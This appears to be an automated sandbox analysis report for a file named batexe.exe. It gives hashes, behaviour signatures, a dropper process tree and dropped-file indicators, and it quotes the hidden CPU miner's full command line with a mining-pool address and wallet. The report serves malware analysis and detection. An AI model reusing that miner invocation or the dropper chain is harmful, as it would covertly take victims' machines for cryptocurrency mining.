Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
295s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
22/02/2024, 13:06
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2424 b2e.exe 4176 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4176 cpuminer-sse2.exe 4176 cpuminer-sse2.exe 4176 cpuminer-sse2.exe 4176 cpuminer-sse2.exe 4176 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/3196-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3196 wrote to memory of 2424 3196 batexe.exe 74 PID 3196 wrote to memory of 2424 3196 batexe.exe 74 PID 3196 wrote to memory of 2424 3196 batexe.exe 74 PID 2424 wrote to memory of 1712 2424 b2e.exe 75 PID 2424 wrote to memory of 1712 2424 b2e.exe 75 PID 2424 wrote to memory of 1712 2424 b2e.exe 75 PID 1712 wrote to memory of 4176 1712 cmd.exe 78 PID 1712 wrote to memory of 4176 1712 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\1884.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\1884.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1884.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1DF3.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4176
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD511516458b4751b21dcb8116ed64f7915
SHA19cf56737f2bd8c986502f56f7905d2b0697efb6c
SHA256d026d5f09fc823dc7714a5cccd06435037c80dafcd3154c6066a824f17aecdbf
SHA5122240f962faf4d00ad4743df976c22725e61869bc574cb30dfa9387afcab3007cb3fe20c1859cd1ebcf8d082838e33c39ce76e1f78f43d6985c0ba04153831fbd
-
Filesize
1.8MB
MD5c8fa8724ee79dde920b828c689552ab5
SHA17e2f937ce5905c7383253fca096662178d37df13
SHA2560a52a3b33e51a01d69ae0dadd8b25e457bc2d3d1a1335c95552c6553fd5f617e
SHA512292d644f61987802b181c864ed64c97e48c94a9d5951cc12969de22a2589cbb0806181d257c9baee3e6c5b4e0ae117b0925ded03992dfb7033cb891417ef666b
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.1MB
MD5d6a2651ce86560ec77259efc3df246fa
SHA11e72d8e5049a66e1f257d00847fae193c2f8bb02
SHA2561703f2c16ca81fd8d53d899d0c191db61af986281cdaf3939e9aafcb2aa377a6
SHA512eece650394d481935c42793702efa7220ae51d92e50dde346b62026d1946418011f665dabe217b6e775b79d65b7580652299a816961a23880abff400ee14201b
-
Filesize
818KB
MD58e05bba5f56dea5aa625b063b643a93e
SHA16e1f33dcbc199dc992b30c7659fc81b0e6651975
SHA25654388d783b8f01f7a21544131a9cc1b1fd6447678a716961e1afaf9a69d5b020
SHA51291d91159c159c0b4172f8f40f88e755ad56ea208acadaad70a4789e70feac67b33e0ea33854993569d3db9f1c7021610ece62f14f65f459220037823f778897c
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.1MB
MD5c5900892d8d923b64363a1c53c390981
SHA11a5810e5ccffdb9b85d4f914a50ced46f0e446c1
SHA256ee43a06d884bcaf4784bc24199fa83945f6bbbb7d5cebd02861887bcfd028198
SHA51276202ce5059066f53da016a31f5f903f711c44574d306ff662c67a921a23fcfcd9e51b405442a415542999ce16fea9ca1026161bec4a2480f48d723a6f20a7c6
-
Filesize
1.2MB
MD56db46b096fa1fbc401032e81c8cfbc50
SHA1d12f4134c3e69fee77ba350df09b52343f557c36
SHA256343caf15553643a766a6706f9fa71183ad4e819102f62dca5a72c3438db2d499
SHA5121ebc7376a744a25b7c42d4da46ba20c1ffc4e607c6eb3a42455dfb7e51f3fbd6532e90042507646bae9a004d9a906dcfbbfa071533dc8cd40726334b476b61b6
-
Filesize
832KB
MD59b527cc7775e3fefc75ebd6cf497b81b
SHA17405b4528854589bc404f55c0e591d2e534d8d63
SHA256eb4270d5203fe07ee63a7161093d69577ada5ad4ca659a6181d63953a69bca72
SHA5126471f61ebc78e6ab30cce7cb444c582a8a24cbcbff1a8cc3d22d20d299d53c6377127e76bcc2a1e2c9108cd65d6fb89d42ddf89b04140c8e225f5115984a4b85
-
Filesize
698KB
MD5fe3b6469f1cc0a82f4be7b919cf7f1f7
SHA182f4541c21fc92ba1603fdc32476ea0f8c03cc3a
SHA256b1fba6dbd2e243fccfce44d782a85c91b24241764b975e3214dadd78ad4f27ea
SHA5128f2bae4f61a574db522961272c91f9acfa298a0c9b4450d58208b6afd2eaf946c90ec0f039743becbae903890786a8d530b5a00dc5eee795c231f8f1ea8f384c
-
Filesize
1.3MB
MD59cdee765bf92bd2c3431fd8249affd94
SHA1c256c9258e68f6545ffeed7e7e619cae76ff7234
SHA2564c2fd52e6e497bf5284b8e54e161d0da82475d569482175733e41d93945c2409
SHA512cbee5b80d8ae3b7f9e1a3ac4110564ae79a73cff59863d155fb2aa4e7c8133ef807e80a4f7a7459a23cdf111a46d9113e8642295c83309a0203eda27964fb69a
-
Filesize
843KB
MD58c19e88cd4a4c82d1c1df35f1323229a
SHA187aea215fb93103386d850fe930a298e35f14412
SHA256dc32e5ecae9e5dc4f202f203f7fcc74ce2a5ec1eb4e1cf3d347d9b4e3b43299a
SHA5127cd2c2ea973827a4b2f635cfc7a16686985092bd0ed820c9102eb066e587d2b46a2134368a6c48acd9b8c42b2cef13f76f5090c07c9a49a708524b5eec9f6f54
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770